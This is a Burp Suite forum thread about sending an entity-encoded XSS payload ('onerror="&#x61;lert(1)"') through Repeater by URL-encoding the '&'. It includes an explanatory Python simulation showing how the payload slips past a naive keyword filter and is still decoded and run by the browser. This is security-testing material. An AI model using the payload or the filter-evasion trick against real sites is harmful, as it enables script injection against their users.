The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum


Avoid character &

Gonzalo | Last updated: Feb 03, 2022 12:18AM UTC

Hello, is there a way to avoid the "&" character in Repeater when using HTML encoding? For example, to exploit XSS via this encoding (as mentioned here https://portswigger.net/web-security/reference/obfuscating-attacks-using-encodings) I use:

```http
GET /search?q=ok"><img+src=x+onerror="&#x61;lert(1)"> HTTP/1.1
Host: localhost
```

Burp Suite interprets the "&" character as a separator between variables. Can I modify this so that it doesn't interpret it that way, so I can send the request normally?

Liam, PortSwigger Agent | Last updated: Feb 03, 2022 01:22PM UTC

I would suggest pasting this into a new Repeater tab > right-click > Convert selection > URL-encode key characters. Alternatively, you can right-click > URL-encode as you type > manually type in the URL in a Repeater tab. Let us know if this helps.
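To see why the `&` has to be percent-encoded before the entity-encoded payload reaches the server, here is an added example (not code from the thread or from PortSwigger) that mimics the three parties involved: the query-string parser on the server, a naive keyword filter, and the browser's entity decoding of an event-handler attribute. The payload is the one from the post; the set of "key characters" encoded by `url_encode_key_chars` is an approximation of what Burp's option does, and the filter and the reflection are assumptions made for illustration.

```python
import html
import re
from urllib.parse import parse_qs

# Constructed input: the entity-encoded XSS vector from the post.
PAYLOAD = 'ok"><img src=x onerror="&#x61;lert(1)">'

# Characters that carry meaning inside a query string. This approximates what
# Burp's "URL-encode key characters" targets; the exact set is an assumption.
KEY_CHARS = "&=#+%;?"


def url_encode_key_chars(text: str) -> str:
    """Percent-encode only the delimiters and leave everything else readable."""
    out = []
    for ch in text:
        if ch == " ":
            out.append("+")                 # form-style space encoding
        elif ch in KEY_CHARS:
            out.append("%%%02X" % ord(ch))  # e.g. '&' -> '%26'
        else:
            out.append(ch)
    return "".join(out)


def raw_request_target(payload: str) -> str:
    """What the original post sent: '&' left as a literal in the query."""
    return "/search?q=" + payload.replace(" ", "+")


def encoded_request_target(payload: str) -> str:
    """The same request after URL-encoding key characters."""
    return "/search?q=" + url_encode_key_chars(payload)


def server_side_params(request_target: str) -> dict:
    """Mimic a typical server: split the query on '&', then on '=', then
    percent-decode each part (parse_qs does all three)."""
    query = request_target.split("?", 1)[1]
    return parse_qs(query, keep_blank_values=True)


def naive_server_filter_blocks(value: str) -> bool:
    """Hypothetical filter that looks for 'alert(' in the raw parameter value.
    The entity form '&#x61;lert(' does not contain that substring."""
    return "alert(" in value.lower()


def browser_onerror_handler(reflected_html: str) -> str:
    """Mimic the browser: an event-handler attribute value is entity-decoded
    before it is handed to the JavaScript engine."""
    m = re.search(r'onerror="([^"]*)"', reflected_html)
    return html.unescape(m.group(1)) if m else ""


if __name__ == "__main__":
    raw = server_side_params(raw_request_target(PAYLOAD))
    # q is cut off at the '&'; the remainder becomes a second, bogus parameter
    print("literal '&':", raw)
    enc = server_side_params(encoded_request_target(PAYLOAD))
    # q now holds the whole vector, '&' included
    print("encoded '&':", enc)
    q = enc["q"][0]
    print("filter sees alert(?", naive_server_filter_blocks(q))
    print("browser executes:", browser_onerror_handler(q))
```

Running it shows the two failure modes side by side: with a literal `&` the server stores only `ok"><img src=x onerror="` under `q` and files `#x61;lert(1)">` as a parameter name, so nothing useful is reflected; with `%26` the full vector is reflected, the substring filter never sees `alert(`, and the browser still decodes `&#x61;lert(1)` to `alert(1)` when it evaluates the handler.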

Gonzalo | Last updated: Feb 07, 2022 11:21PM UTC

Hello! Thanks for your reply. Sometimes I have the problem that when I send a request with this character encoded (&=%26), the server does not interpret the encoding. I guess this is a restriction in the app in front of me.

Liam, PortSwigger Agent | Last updated: Feb 08, 2022 10:01AM UTC

If you encounter this error in the future, could you email us with a screenshot? (support@portswigger.net)

Gonzalo | Last updated: Feb 18, 2022 01:18AM UTC